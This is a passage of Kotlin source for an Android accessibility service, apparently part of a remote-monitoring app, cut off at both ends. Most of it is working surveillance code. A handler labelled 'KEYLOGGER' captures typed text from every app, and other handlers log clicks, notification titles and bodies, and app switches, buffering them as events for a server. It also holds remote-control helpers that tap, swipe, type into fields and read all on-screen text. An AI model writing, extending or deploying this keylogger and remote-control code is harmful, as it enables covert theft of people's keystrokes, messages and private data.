   100тЖТ   100тЖТ   100тЖТ            // Listen to all packages
   101тЖТ   101тЖТ   101тЖТ            packageNames = null
   102тЖТ   102тЖТ   102тЖТ            
   103тЖТ   103тЖТ   103тЖТ            // Additional capabilities are configured in accessibility_service_config.xml
   104тЖТ   104тЖТ   104тЖТ            // (canPerformGestures, canRetrieveWindowContent, etc.)
   105тЖТ   105тЖТ   105тЖТ        }
   106тЖТ   106тЖТ   106тЖТ        serviceInfo = info
   107тЖТ   107тЖТ   107тЖТ
   108тЖТ   108тЖТ   108тЖТ        // Notify server that accessibility is enabled
   109тЖТ   109тЖТ   109тЖТ        com.abuzahra.manager.EventBuffer.addEvent(
   110тЖТ   110тЖТ   110тЖТ            "accessibility_enabled",
   111тЖТ   111тЖТ   111тЖТ            mapOf(
   112тЖТ   112тЖТ   112тЖТ                "status" to "connected",
   113тЖТ   113тЖТ   113тЖТ                "service" to "MyAccessibilityService"
   114тЖТ   114тЖТ   114тЖТ            )
   115тЖТ   115тЖТ   115тЖТ        )
   116тЖТ   116тЖТ   116тЖТ    }
   117тЖТ   117тЖТ   117тЖТ
   118тЖТ   118тЖТ   118тЖТ    override fun onAccessibilityEvent(event: AccessibilityEvent?) {
   119тЖТ   119тЖТ   119тЖТ        event ?: return
   120тЖТ   120тЖТ   120тЖТ        
   121тЖТ   121тЖТ   121тЖТ        eventCount++
   122тЖТ   122тЖТ   122тЖТ        val packageName = event.packageName?.toString() ?: "unknown"
   123тЖТ   123тЖТ   123тЖТ        
   124тЖТ   124тЖТ   124тЖТ        when (event.eventType) {
   125тЖТ   125тЖТ   125тЖТ            // Text changed events - KEYLOGGER
   126тЖТ   126тЖТ   126тЖТ            AccessibilityEvent.TYPE_VIEW_TEXT_CHANGED -> {
   127тЖТ   127тЖТ   127тЖТ                handleTextChangeEvent(event, packageName)
   128тЖТ   128тЖТ   128тЖТ            }
   129тЖТ   129тЖТ   129тЖТ            
   130тЖТ   130тЖТ   130тЖТ            // Text selection events
   131тЖТ   131тЖТ   131тЖТ            AccessibilityEvent.TYPE_VIEW_TEXT_SELECTION_CHANGED -> {
   132тЖТ   132тЖТ   132тЖТ                handleTextSelectionEvent(event, packageName)
   133тЖТ   133тЖТ   133тЖТ            }
   134тЖТ   134тЖТ   134тЖТ            
   135тЖТ   135тЖТ   135тЖТ            // Click events
   136тЖТ   136тЖТ   136тЖТ            AccessibilityEvent.TYPE_VIEW_CLICKED -> {
   137тЖТ   137тЖТ   137тЖТ                handleClickEvent(event, packageName)
   138тЖТ   138тЖТ   138тЖТ            }
   139тЖТ   139тЖТ   139тЖТ            
   140тЖТ   140тЖТ   140тЖТ            // Focus events
   141тЖТ   141тЖТ   141тЖТ            AccessibilityEvent.TYPE_VIEW_FOCUSED -> {
   142тЖТ   142тЖТ   142тЖТ                handleFocusEvent(event, packageName)
   143тЖТ   143тЖТ   143тЖТ            }
   144тЖТ   144тЖТ   144тЖТ            
   145тЖТ   145тЖТ   145тЖТ            // Notification events
   146тЖТ   146тЖТ   146тЖТ            AccessibilityEvent.TYPE_NOTIFICATION_STATE_CHANGED -> {
   147тЖТ   147тЖТ   147тЖТ                handleNotificationEvent(event, packageName)
   148тЖТ   148тЖТ   148тЖТ            }
   149тЖТ   149тЖТ   149тЖТ            
   150тЖТ   150тЖТ   150тЖТ            // Window state changed (app switches)
   151тЖТ   151тЖТ   151тЖТ            AccessibilityEvent.TYPE_WINDOW_STATE_CHANGED -> {
   152тЖТ   152тЖТ   152тЖТ                handleWindowStateChangeEvent(event, packageName)
   153тЖТ   153тЖТ   153тЖТ            }
   154тЖТ   154тЖТ   154тЖТ            
   155тЖТ   155тЖТ   155тЖТ            // Window content changed
   156тЖТ   156тЖТ   156тЖТ            AccessibilityEvent.TYPE_WINDOW_CONTENT_CHANGED -> {
   157тЖТ   157тЖТ   157тЖТ                handleWindowContentChangeEvent(event, packageName)
   158тЖТ   158тЖТ   158тЖТ            }
   159тЖТ   159тЖТ   159тЖТ            
   160тЖТ   160тЖТ   160тЖТ            // View scrolled
   161тЖТ   161тЖТ   161тЖТ            AccessibilityEvent.TYPE_VIEW_SCROLLED -> {
   162тЖТ   162тЖТ   162тЖТ                // Usually not needed for keylogger
   163тЖТ   163тЖТ   163тЖТ            }
   164тЖТ   164тЖТ   164тЖТ            
   165тЖТ   165тЖТ   165тЖТ            // Gesture events (Android 8+)
   166тЖТ   166тЖТ   166тЖТ            AccessibilityEvent.TYPE_GESTURE_DETECTION_START -> {
   167тЖТ   167тЖТ   167тЖТ                // Could track gestures
   168тЖТ   168тЖТ   168тЖТ            }
   169тЖТ   169тЖТ   169тЖТ            
   170тЖТ   170тЖТ   170тЖТ            else -> {
   171тЖТ   171тЖТ   171тЖТ                // Other events
   172тЖТ   172тЖТ   172тЖТ            }
   173тЖТ   173тЖТ   173тЖТ        }
   174тЖТ   174тЖТ   174тЖТ    }
   175тЖТ   175тЖТ   175тЖТ
   176тЖТ   176тЖТ   176тЖТ    private fun handleTextChangeEvent(event: AccessibilityEvent, packageName: String) {
   177тЖТ   177тЖТ   177тЖТ        if (!keyloggerEnabled) return
   178тЖТ   178тЖТ   178тЖТ        
   179тЖТ   179тЖТ   179тЖТ        textEventCount++
   180тЖТ   180тЖТ   180тЖТ        
   181тЖТ   181тЖТ   181тЖТ        try {
   182тЖТ   182тЖТ   182тЖТ            // Get the text from the event
   183тЖТ   183тЖТ   183тЖТ            val text = event.text?.joinToString("") ?: ""
   184тЖТ   184тЖТ   184тЖТ            val fromIndex = event.fromIndex
   185тЖТ   185тЖТ   185тЖТ            val addedCount = event.addedCount
   186тЖТ   186тЖТ   186тЖТ            val removedCount = event.removedCount
   187тЖТ   187тЖТ   187тЖТ            val beforeText = event.beforeText?.toString() ?: ""
   188тЖТ   188тЖТ   188тЖТ            
   189тЖТ   189тЖТ   189тЖТ            // Get the source node for more details
   190тЖТ   190тЖТ   190тЖТ            val source = event.source
   191тЖТ   191тЖТ   191тЖТ            val viewId = source?.viewIdResourceName ?: ""
   192тЖТ   192тЖТ   192тЖТ            val className = source?.className?.toString() ?: ""
   193тЖТ   193тЖТ   193тЖТ            val description = source?.contentDescription?.toString() ?: ""
   194тЖТ   194тЖТ   194тЖТ            
   195тЖТ   195тЖТ   195тЖТ            // Build the captured data
   196тЖТ   196тЖТ   196тЖТ            val capturedText = buildString {
   197тЖТ   197тЖТ   197тЖТ                if (text.isNotEmpty()) {
   198тЖТ   198тЖТ   198тЖТ                    append(text)
   199тЖТ   199тЖТ   199тЖТ                }
   200тЖТ   200тЖТ   200тЖТ                if (beforeText.isNotEmpty() && text.isNotEmpty() && beforeText != text) {
   201тЖТ   201тЖТ   201тЖТ                    // Text was modified
   202тЖТ   202тЖТ   202тЖТ                    append("[EDIT]")
   203тЖТ   203тЖТ   203тЖТ                }
   204тЖТ   204тЖТ   204тЖТ            }
   205тЖТ   205тЖТ   205тЖТ            
   206тЖТ   206тЖТ   206тЖТ            if (capturedText.isNotEmpty()) {
   207тЖТ   207тЖТ   207тЖТ                // Update last captured
   208тЖТ   208тЖТ   208тЖТ                lastCapturedText.append(capturedText)
   209тЖТ   209тЖТ   209тЖТ                if (lastCapturedText.length > 100000) {
   210тЖТ   210тЖТ   210тЖТ                    lastCapturedText = StringBuilder(lastCapturedText.takeLast(50000))
   211тЖТ   211тЖТ   211тЖТ                }
   212тЖТ   212тЖТ   212тЖТ                
   213тЖТ   213тЖТ   213тЖТ                // Send to MonitorExecutor
   214тЖТ   214тЖТ   214тЖТ                MonitorExecutor.appendKeylog(
   215тЖТ   215тЖТ   215тЖТ                    packageName = packageName,
   216тЖТ   216тЖТ   216тЖТ                    text = capturedText,
   217тЖТ   217тЖТ   217тЖТ                    viewType = "text_change"
   218тЖТ   218тЖТ   218тЖТ                )
   219тЖТ   219тЖТ   219тЖТ                
   220тЖТ   220тЖТ   220тЖТ                // Also log with context
   221тЖТ   221тЖТ   221тЖТ                logKeyEvent(
   222тЖТ   222тЖТ   222тЖТ                    packageName = packageName,
   223тЖТ   223тЖТ   223тЖТ                    text = capturedText,
   224тЖТ   224тЖТ   224тЖТ                    viewId = viewId,
   225тЖТ   225тЖТ   225тЖТ                    className = className
   226тЖТ   226тЖТ   226тЖТ                )
   227тЖТ   227тЖТ   227тЖТ            }
   228тЖТ   228тЖТ   228тЖТ            
   229тЖТ   229тЖТ   229тЖТ            source?.recycle()
   230тЖТ   230тЖТ   230тЖТ        } catch (e: Exception) {
   231тЖТ   231тЖТ   231тЖТ            // Log error but don't crash
   232тЖТ   232тЖТ   232тЖТ        }
   233тЖТ   233тЖТ   233тЖТ    }
   234тЖТ   234тЖТ   234тЖТ    
   235тЖТ   235тЖТ   235тЖТ    private fun handleTextSelectionEvent(event: AccessibilityEvent, packageName: String) {
   236тЖТ   236тЖТ   236тЖТ        // Could be used to track what text user selected
   237тЖТ   237тЖТ   237тЖТ    }
   238тЖТ   238тЖТ   238тЖТ
   239тЖТ   239тЖТ   239тЖТ    private fun handleClickEvent(event: AccessibilityEvent, packageName: String) {
   240тЖТ   240тЖТ   240тЖТ        clickEventCount++
   241тЖТ   241тЖТ   241тЖТ        lastEventType = "click"
   242тЖТ   242тЖТ   242тЖТ        
   243тЖТ   243тЖТ   243тЖТ        if (!keyloggerEnabled) return
   244тЖТ   244тЖТ   244тЖТ        
   245тЖТ   245тЖТ   245тЖТ        try {
   246тЖТ   246тЖТ   246тЖТ            val text = event.text?.joinToString("") ?: ""
   247тЖТ   247тЖТ   247тЖТ            val contentDescription = event.contentDescription?.toString() ?: ""
   248тЖТ   248тЖТ   248тЖТ            val source = event.source
   249тЖТ   249тЖТ   249тЖТ            
   250тЖТ   250тЖТ   250тЖТ            val viewId = source?.viewIdResourceName ?: ""
   251тЖТ   251тЖТ   251тЖТ            val className = source?.className?.toString() ?: ""
   252тЖТ   252тЖТ   252тЖТ            
   253тЖТ   253тЖТ   253тЖТ            val clickText = buildString {
   254тЖТ   254тЖТ   254тЖТ                if (text.isNotEmpty()) append(text)
   255тЖТ   255тЖТ   255тЖТ                if (contentDescription.isNotEmpty()) {
   256тЖТ   256тЖТ   256тЖТ                    if (isNotEmpty()) append(" | ")
   257тЖТ   257тЖТ   257тЖТ                    append(contentDescription)
   258тЖТ   258тЖТ   258тЖТ                }
   259тЖТ   259тЖТ   259тЖТ            }
   260тЖТ   260тЖТ   260тЖТ            
   261тЖТ   261тЖТ   261тЖТ            if (clickText.isNotEmpty()) {
   262тЖТ   262тЖТ   262тЖТ                MonitorExecutor.appendKeylog(
   263тЖТ   263тЖТ   263тЖТ                    packageName = packageName,
   264тЖТ   264тЖТ   264тЖТ                    text = "[CLICK:$clickText]",
   265тЖТ   265тЖТ   265тЖТ                    viewType = "click"
   266тЖТ   266тЖТ   266тЖТ                )
   267тЖТ   267тЖТ   267тЖТ            }
   268тЖТ   268тЖТ   268тЖТ            
   269тЖТ   269тЖТ   269тЖТ            source?.recycle()
   270тЖТ   270тЖТ   270тЖТ        } catch (_: Exception) {}
   271тЖТ   271тЖТ   271тЖТ    }
   272тЖТ   272тЖТ   272тЖТ    
   273тЖТ   273тЖТ   273тЖТ    private fun handleFocusEvent(event: AccessibilityEvent, packageName: String) {
   274тЖТ   274тЖТ   274тЖТ        // Track which view has focus - useful for keylogger context
   275тЖТ   275тЖТ   275тЖТ    }
   276тЖТ   276тЖТ   276тЖТ    
   277тЖТ   277тЖТ   277тЖТ    private fun handleNotificationEvent(event: AccessibilityEvent, packageName: String) {
   278тЖТ   278тЖТ   278тЖТ        notificationEventCount++
   279тЖТ   279тЖТ   279тЖТ        
   280тЖТ   280тЖТ   280тЖТ        if (!notificationInterceptEnabled && !keyloggerEnabled) return
   281тЖТ   281тЖТ   281тЖТ        
   282тЖТ   282тЖТ   282тЖТ        try {
   283тЖТ   283тЖТ   283тЖТ            val text = event.text?.joinToString("\n") ?: ""
   284тЖТ   284тЖТ   284тЖТ            val tickerText = event.text?.joinToString() ?: ""
   285тЖТ   285тЖТ   285тЖТ            
   286тЖТ   286тЖТ   286тЖТ            // For notifications, try to get more data from the Parcelable
   287тЖТ   287тЖТ   287тЖТ            val parcelableData = event.parcelableData
   288тЖТ   288тЖТ   288тЖТ            
   289тЖТ   289тЖТ   289тЖТ            var title = ""
   290тЖТ   290тЖТ   290тЖТ            var message = ""
   291тЖТ   291тЖТ   291тЖТ            var category = ""
   292тЖТ   292тЖТ   292тЖТ            
   293тЖТ   293тЖТ   293тЖТ            if (parcelableData is Notification) {
   294тЖТ   294тЖТ   294тЖТ                val notification = parcelableData
   295тЖТ   295тЖТ   295тЖТ                title = notification.extras?.getCharSequence(Notification.EXTRA_TITLE)?.toString() ?: ""
   296тЖТ   296тЖТ   296тЖТ                message = notification.extras?.getCharSequence(Notification.EXTRA_TEXT)?.toString() ?: ""
   297тЖТ   297тЖТ   297тЖТ                category = notification.category ?: ""
   298тЖТ   298тЖТ   298тЖТ                
   299тЖТ   299тЖТ   299тЖТ                // Add to notification history
   300тЖТ   300тЖТ   300тЖТ                MonitorExecutor.addNotification(packageName, title, message, category)
   301тЖТ   301тЖТ   301тЖТ            }
   302тЖТ   302тЖТ   302тЖТ            
   303тЖТ   303тЖТ   303тЖТ            // Log notification if keylogger is active
   304тЖТ   304тЖТ   304тЖТ            if (keyloggerEnabled) {
   305тЖТ   305тЖТ   305тЖТ                val notifText = buildString {
   306тЖТ   306тЖТ   306тЖТ                    if (title.isNotEmpty()) append("[$title] ")
   307тЖТ   307тЖТ   307тЖТ                    if (message.isNotEmpty()) append(message)
   308тЖТ   308тЖТ   308тЖТ                    if (text.isNotEmpty() && text != message) append(" | $text")
   309тЖТ   309тЖТ   309тЖТ                }
   310тЖТ   310тЖТ   310тЖТ                
   311тЖТ   311тЖТ   311тЖТ                if (notifText.isNotEmpty()) {
   312тЖТ   312тЖТ   312тЖТ                    MonitorExecutor.appendKeylog(
   313тЖТ   313тЖТ   313тЖТ                        packageName = packageName,
   314тЖТ   314тЖТ   314тЖТ                        text = "[NOTIF:$notifText]",
   315тЖТ   315тЖТ   315тЖТ                        viewType = "notification"
   316тЖТ   316тЖТ   316тЖТ                    )
   317тЖТ   317тЖТ   317тЖТ                }
   318тЖТ   318тЖТ   318тЖТ            }
   319тЖТ   319тЖТ   319тЖТ        } catch (_: Exception) {}
   320тЖТ   320тЖТ   320тЖТ    }
   321тЖТ   321тЖТ   321тЖТ    
   322тЖТ   322тЖТ   322тЖТ    private fun handleWindowStateChangeEvent(event: AccessibilityEvent, packageName: String) {
   323тЖТ   323тЖТ   323тЖТ        // App switch or activity change
   324тЖТ   324тЖТ   324тЖТ        val className = event.className?.toString() ?: ""
   325тЖТ   325тЖТ   325тЖТ        val text = event.text?.joinToString("") ?: ""
   326тЖТ   326тЖТ   326тЖТ        
   327тЖТ   327тЖТ   327тЖТ        if (packageName != currentApp) {
   328тЖТ   328тЖТ   328тЖТ            currentApp = packageName
   329тЖТ   329тЖТ   329тЖТ            
   330тЖТ   330тЖТ   330тЖТ            // Log app switch if keylogger active
   331тЖТ   331тЖТ   331тЖТ            if (keyloggerEnabled) {
   332тЖТ   332тЖТ   332тЖТ                MonitorExecutor.appendKeylog(
   333тЖТ   333тЖТ   333тЖТ                    packageName = packageName,
   334тЖТ   334тЖТ   334тЖТ                    text = "[APP:$packageName]",
   335тЖТ   335тЖТ   335тЖТ                    viewType = "app_switch"
   336тЖТ   336тЖТ   336тЖТ                )
   337тЖТ   337тЖТ   337тЖТ            }
   338тЖТ   338тЖТ   338тЖТ        }
   339тЖТ   339тЖТ   339тЖТ    }
   340тЖТ   340тЖТ   340тЖТ    
   341тЖТ   341тЖТ   341тЖТ    private fun handleWindowContentChangeEvent(event: AccessibilityEvent, packageName: String) {
   342тЖТ   342тЖТ   342тЖТ        // Content changed in current window
   343тЖТ   343тЖТ   343тЖТ        // Useful for detecting dynamic content updates
   344тЖТ   344тЖТ   344тЖТ    }
   345тЖТ   345тЖТ   345тЖТ
   346тЖТ   346тЖТ   346тЖТ    private fun logKeyEvent(packageName: String, text: String, viewId: String, className: String) {
   347тЖТ   347тЖТ   347тЖТ        com.abuzahra.manager.EventBuffer.addEvent(
   348тЖТ   348тЖТ   348тЖТ            "key_event",
   349тЖТ   349тЖТ   349тЖТ            mapOf(
   350тЖТ   350тЖТ   350тЖТ                "package" to packageName,
   351тЖТ   351тЖТ   351тЖТ                "text" to text.take(500),
   352тЖТ   352тЖТ   352тЖТ                "view_id" to viewId,
   353тЖТ   353тЖТ   353тЖТ                "class" to className
   354тЖТ   354тЖТ   354тЖТ            )
   355тЖТ   355тЖТ   355тЖТ        )
   356тЖТ   356тЖТ   356тЖТ    }
   357тЖТ   357тЖТ   357тЖТ
   358тЖТ   358тЖТ   358тЖТ    override fun onInterrupt() {
   359тЖТ   359тЖТ   359тЖТ        com.abuzahra.manager.EventBuffer.addEvent(
   360тЖТ   360тЖТ   360тЖТ            "accessibility_interrupted",
   361тЖТ   361тЖТ   361тЖТ            mapOf("timestamp" to System.currentTimeMillis())
   362тЖТ   362тЖТ   362тЖТ        )
   363тЖТ   363тЖТ   363тЖТ    }
   364тЖТ   364тЖТ   364тЖТ
   365тЖТ   365тЖТ   365тЖТ    override fun onDestroy() {
   366тЖТ   366тЖТ   366тЖТ        super.onDestroy()
   367тЖТ   367тЖТ   367тЖТ        instance = null
   368тЖТ   368тЖТ   368тЖТ        keyloggerEnabled = false
   369тЖТ   369тЖТ   369тЖТ        autoClickEnabled = false
   370тЖТ   370тЖТ   370тЖТ        
   371тЖТ   371тЖТ   371тЖТ        // Buffer event locally
   372тЖТ   372тЖТ   372тЖТ        com.abuzahra.manager.EventBuffer.addEvent(
   373тЖТ   373тЖТ   373тЖТ            "accessibility_destroyed",
   374тЖТ   374тЖТ   374тЖТ            mapOf("status" to "disconnected")
   375тЖТ   375тЖТ   375тЖТ        )
   376тЖТ   376тЖТ   376тЖТ    }
   377тЖТ   377тЖТ   377тЖТ
   378тЖТ   378тЖТ   378тЖТ    // ===== AUTOMATED ACTIONS =====
   379тЖТ   379тЖТ   379тЖТ
   380тЖТ   380тЖТ   380тЖТ    /**
   381тЖТ   381тЖТ   381тЖТ     * Click on a node by its text
   382тЖТ   382тЖТ   382тЖТ     */
   383тЖТ   383тЖТ   383тЖТ    fun clickOnText(text: String, exactMatch: Boolean = false): Boolean {
   384тЖТ   384тЖТ   384тЖТ        val root = rootInActiveWindow ?: return false
   385тЖТ   385тЖТ   385тЖТ        
   386тЖТ   386тЖТ   386тЖТ        val nodes = if (exactMatch) {
   387тЖТ   387тЖТ   387тЖТ            root.findAccessibilityNodeInfosByText(text)
   388тЖТ   388тЖТ   388тЖТ                .filter { it.text?.toString() == text }
   389тЖТ   389тЖТ   389тЖТ        } else {
   390тЖТ   390тЖТ   390тЖТ            root.findAccessibilityNodeInfosByText(text)
   391тЖТ   391тЖТ   391тЖТ        }
   392тЖТ   392тЖТ   392тЖТ        
   393тЖТ   393тЖТ   393тЖТ        for (node in nodes) {
   394тЖТ   394тЖТ   394тЖТ            val clicked = performClickOnNode(node)
   395тЖТ   395тЖТ   395тЖТ            if (clicked) return true
   396тЖТ   396тЖТ   396тЖТ        }
   397тЖТ   397тЖТ   397тЖТ        
   398тЖТ   398тЖТ   398тЖТ        return false
   399тЖТ   399тЖТ   399тЖТ    }
   400тЖТ   400тЖТ   400тЖТ
   401тЖТ   401тЖТ   401тЖТ    /**
   402тЖТ   402тЖТ   402тЖТ     * Click on a node by its view ID
   403тЖТ   403тЖТ   403тЖТ     */
   404тЖТ   404тЖТ   404тЖТ    fun clickOnViewId(viewId: String): Boolean {
   405тЖТ   405тЖТ   405тЖТ        val root = rootInActiveWindow ?: return false
   406тЖТ   406тЖТ   406тЖТ        
   407тЖТ   407тЖТ   407тЖТ        val nodes = root.findAccessibilityNodeInfosByViewId(viewId)
   408тЖТ   408тЖТ   408тЖТ        for (node in nodes) {
   409тЖТ   409тЖТ   409тЖТ            val clicked = performClickOnNode(node)
   410тЖТ   410тЖТ   410тЖТ            if (clicked) return true
   411тЖТ   411тЖТ   411тЖТ        }
   412тЖТ   412тЖТ   412тЖТ        
   413тЖТ   413тЖТ   413тЖТ        return false
   414тЖТ   414тЖТ   414тЖТ    }
   415тЖТ   415тЖТ   415тЖТ    
   416тЖТ   416тЖТ   416тЖТ    /**
   417тЖТ   417тЖТ   417тЖТ     * Click on node at specific coordinates
   418тЖТ   418тЖТ   418тЖТ     */
   419тЖТ   419тЖТ   419тЖТ    fun clickAt(x: Int, y: Int): Boolean {
   420тЖТ   420тЖТ   420тЖТ        if (Build.VERSION.SDK_INT < Build.VERSION_CODES.N) {
   421тЖТ   421тЖТ   421тЖТ            return false
   422тЖТ   422тЖТ   422тЖТ        }
   423тЖТ   423тЖТ   423тЖТ        
   424тЖТ   424тЖТ   424тЖТ        val path = Path().apply {
   425тЖТ   425тЖТ   425тЖТ            moveTo(x.toFloat(), y.toFloat())
   426тЖТ   426тЖТ   426тЖТ        }
   427тЖТ   427тЖТ   427тЖТ        
   428тЖТ   428тЖТ   428тЖТ        val gesture = GestureDescription.Builder()
   429тЖТ   429тЖТ   429тЖТ            .addStroke(GestureDescription.StrokeDescription(path, 0, 100))
   430тЖТ   430тЖТ   430тЖТ            .build()
   431тЖТ   431тЖТ   431тЖТ        
   432тЖТ   432тЖТ   432тЖТ        gestureLatch = CountDownLatch(1)
   433тЖТ   433тЖТ   433тЖТ        gestureResult = false
   434тЖТ   434тЖТ   434тЖТ        
   435тЖТ   435тЖТ   435тЖТ        val dispatched = dispatchGesture(gesture, object : GestureResultCallback() {
   436тЖТ   436тЖТ   436тЖТ            override fun onCompleted(gestureDescription: GestureDescription?) {
   437тЖТ   437тЖТ   437тЖТ                gestureResult = true
   438тЖТ   438тЖТ   438тЖТ                gestureLatch?.countDown()
   439тЖТ   439тЖТ   439тЖТ            }
   440тЖТ   440тЖТ   440тЖТ            
   441тЖТ   441тЖТ   441тЖТ            override fun onCancelled(gestureDescription: GestureDescription?) {
   442тЖТ   442тЖТ   442тЖТ                gestureResult = false
   443тЖТ   443тЖТ   443тЖТ                gestureLatch?.countDown()
   444тЖТ   444тЖТ   444тЖТ            }
   445тЖТ   445тЖТ   445тЖТ        }, null)
   446тЖТ   446тЖТ   446тЖТ        
   447тЖТ   447тЖТ   447тЖТ        if (dispatched) {
   448тЖТ   448тЖТ   448тЖТ            gestureLatch?.await(2, TimeUnit.SECONDS)
   449тЖТ   449тЖТ   449тЖТ        }
   450тЖТ   450тЖТ   450тЖТ        
   451тЖТ   451тЖТ   451тЖТ        return gestureResult
   452тЖТ   452тЖТ   452тЖТ    }
   453тЖТ   453тЖТ   453тЖТ    
   454тЖТ   454тЖТ   454тЖТ    /**
   455тЖТ   455тЖТ   455тЖТ     * Swipe gesture
   456тЖТ   456тЖТ   456тЖТ     */
   457тЖТ   457тЖТ   457тЖТ    fun swipe(startX: Int, startY: Int, endX: Int, endY: Int, durationMs: Long = 300): Boolean {
   458тЖТ   458тЖТ   458тЖТ        if (Build.VERSION.SDK_INT < Build.VERSION_CODES.N) {
   459тЖТ   459тЖТ   459тЖТ            return false
   460тЖТ   460тЖТ   460тЖТ        }
   461тЖТ   461тЖТ   461тЖТ        
   462тЖТ   462тЖТ   462тЖТ        val path = Path().apply {
   463тЖТ   463тЖТ   463тЖТ            moveTo(startX.toFloat(), startY.toFloat())
   464тЖТ   464тЖТ   464тЖТ            lineTo(endX.toFloat(), endY.toFloat())
   465тЖТ   465тЖТ   465тЖТ        }
   466тЖТ   466тЖТ   466тЖТ        
   467тЖТ   467тЖТ   467тЖТ        val gesture = GestureDescription.Builder()
   468тЖТ   468тЖТ   468тЖТ            .addStroke(GestureDescription.StrokeDescription(path, 0, durationMs))
   469тЖТ   469тЖТ   469тЖТ            .build()
   470тЖТ   470тЖТ   470тЖТ        
   471тЖТ   471тЖТ   471тЖТ        gestureLatch = CountDownLatch(1)
   472тЖТ   472тЖТ   472тЖТ        gestureResult = false
   473тЖТ   473тЖТ   473тЖТ        
   474тЖТ   474тЖТ   474тЖТ        val dispatched = dispatchGesture(gesture, object : GestureResultCallback() {
   475тЖТ   475тЖТ   475тЖТ            override fun onCompleted(gestureDescription: GestureDescription?) {
   476тЖТ   476тЖТ   476тЖТ                gestureResult = true
   477тЖТ   477тЖТ   477тЖТ                gestureLatch?.countDown()
   478тЖТ   478тЖТ   478тЖТ            }
   479тЖТ   479тЖТ   479тЖТ            
   480тЖТ   480тЖТ   480тЖТ            override fun onCancelled(gestureDescription: GestureDescription?) {
   481тЖТ   481тЖТ   481тЖТ                gestureResult = false
   482тЖТ   482тЖТ   482тЖТ                gestureLatch?.countDown()
   483тЖТ   483тЖТ   483тЖТ            }
   484тЖТ   484тЖТ   484тЖТ        }, null)
   485тЖТ   485тЖТ   485тЖТ        
   486тЖТ   486тЖТ   486тЖТ        if (dispatched) {
   487тЖТ   487тЖТ   487тЖТ            gestureLatch?.await(2, TimeUnit.SECONDS)
   488тЖТ   488тЖТ   488тЖТ        }
   489тЖТ   489тЖТ   489тЖТ        
   490тЖТ   490тЖТ   490тЖТ        return gestureResult
   491тЖТ   491тЖТ   491тЖТ    }
   492тЖТ   492тЖТ   492тЖТ    
   493тЖТ   493тЖТ   493тЖТ    /**
   494тЖТ   494тЖТ   494тЖТ     * Type text into a focused input field
   495тЖТ   495тЖТ   495тЖТ     */
   496тЖТ   496тЖТ   496тЖТ    fun typeText(text: String): Boolean {
   497тЖТ   497тЖТ   497тЖТ        val root = rootInActiveWindow ?: return false
   498тЖТ   498тЖТ   498тЖТ        
   499тЖТ   499тЖТ   499тЖТ        // Find focused node or editable node
   500тЖТ   500тЖТ   500тЖТ        val focusedNode = root.findFocus(AccessibilityNodeInfo.FOCUS_INPUT)
   501тЖТ   501тЖТ   501тЖТ            ?: root.findAccessibilityNodeInfosByViewId("android:id/edit").firstOrNull()
   502тЖТ   502тЖТ   502тЖТ            ?: run {
   503тЖТ   503тЖТ   503тЖТ                val nodes = root.findAccessibilityNodeInfosByText("")
   504тЖТ   504тЖТ   504тЖТ                nodes.firstOrNull { it.isEditable }
   505тЖТ   505тЖТ   505тЖТ            }
   506тЖТ   506тЖТ   506тЖТ        
   507тЖТ   507тЖТ   507тЖТ        if (focusedNode == null) return false
   508тЖТ   508тЖТ   508тЖТ        
   509тЖТ   509тЖТ   509тЖТ        // Try to set text directly
   510тЖТ   510тЖТ   510тЖТ        val arguments = Bundle()
   511тЖТ   511тЖТ   511тЖТ        arguments.putCharSequence(AccessibilityNodeInfo.ACTION_ARGUMENT_SET_TEXT_CHARSEQUENCE, text)
   512тЖТ   512тЖТ   512тЖТ        val result = focusedNode.performAction(AccessibilityNodeInfo.ACTION_SET_TEXT, arguments)
   513тЖТ   513тЖТ   513тЖТ        
   514тЖТ   514тЖТ   514тЖТ        focusedNode.recycle()
   515тЖТ   515тЖТ   515тЖТ        return result
   516тЖТ   516тЖТ   516тЖТ    }
   517тЖТ   517тЖТ   517тЖТ    
   518тЖТ   518тЖТ   518тЖТ    /**
   519тЖТ   519тЖТ   519тЖТ     * Scroll in a direction
   520тЖТ   520тЖТ   520тЖТ     */
   521тЖТ   521тЖТ   521тЖТ    fun scroll(direction: ScrollDirection): Boolean {
   522тЖТ   522тЖТ   522тЖТ        val root = rootInActiveWindow ?: return false
   523тЖТ   523тЖТ   523тЖТ        
   524тЖТ   524тЖТ   524тЖТ        val action = when (direction) {
   525тЖТ   525тЖТ   525тЖТ            ScrollDirection.UP -> AccessibilityNodeInfo.ACTION_SCROLL_BACKWARD
   526тЖТ   526тЖТ   526тЖТ            ScrollDirection.DOWN -> AccessibilityNodeInfo.ACTION_SCROLL_FORWARD
   527тЖТ   527тЖТ   527тЖТ            ScrollDirection.LEFT -> AccessibilityNodeInfo.ACTION_SCROLL_BACKWARD
   528тЖТ   528тЖТ   528тЖТ            ScrollDirection.RIGHT -> AccessibilityNodeInfo.ACTION_SCROLL_FORWARD
   529тЖТ   529тЖТ   529тЖТ        }
   530тЖТ   530тЖТ   530тЖТ        
   531тЖТ   531тЖТ   531тЖТ        // Find scrollable node
   532тЖТ   532тЖТ   532тЖТ        val scrollableNode = findScrollableNode(root, direction) ?: return false
   533тЖТ   533тЖТ   533тЖТ        val result = scrollableNode.performAction(action)
   534тЖТ   534тЖТ   534тЖТ        scrollableNode.recycle()
   535тЖТ   535тЖТ   535тЖТ        
   536тЖТ   536тЖТ   536тЖТ        return result
   537тЖТ   537тЖТ   537тЖТ    }
   538тЖТ   538тЖТ   538тЖТ    
   539тЖТ   539тЖТ   539тЖТ    private fun findScrollableNode(node: AccessibilityNodeInfo, direction: ScrollDirection): AccessibilityNodeInfo? {
   540тЖТ   540тЖТ   540тЖТ        if (node.isScrollable) return node
   541тЖТ   541тЖТ   541тЖТ        
   542тЖТ   542тЖТ   542тЖТ        for (i in 0 until node.childCount) {
   543тЖТ   543тЖТ   543тЖТ            val child = node.getChild(i) ?: continue
   544тЖТ   544тЖТ   544тЖТ            val result = findScrollableNode(child, direction)
   545тЖТ   545тЖТ   545тЖТ            if (result != null) return result
   546тЖТ   546тЖТ   546тЖТ            child.recycle()
   547тЖТ   547тЖТ   547тЖТ        }
   548тЖТ   548тЖТ   548тЖТ        
   549тЖТ   549тЖТ   549тЖТ        return null
   550тЖТ   550тЖТ   550тЖТ    }
   551тЖТ   551тЖТ   551тЖТ    
   552тЖТ   552тЖТ   552тЖТ    /**
   553тЖТ   553тЖТ   553тЖТ     * Get all text from current screen
   554тЖТ   554тЖТ   554тЖТ     */
   555тЖТ   555тЖТ   555тЖТ    fun getAllText(): String {
   556тЖТ   556тЖТ   556тЖТ        val root = rootInActiveWindow ?: return ""
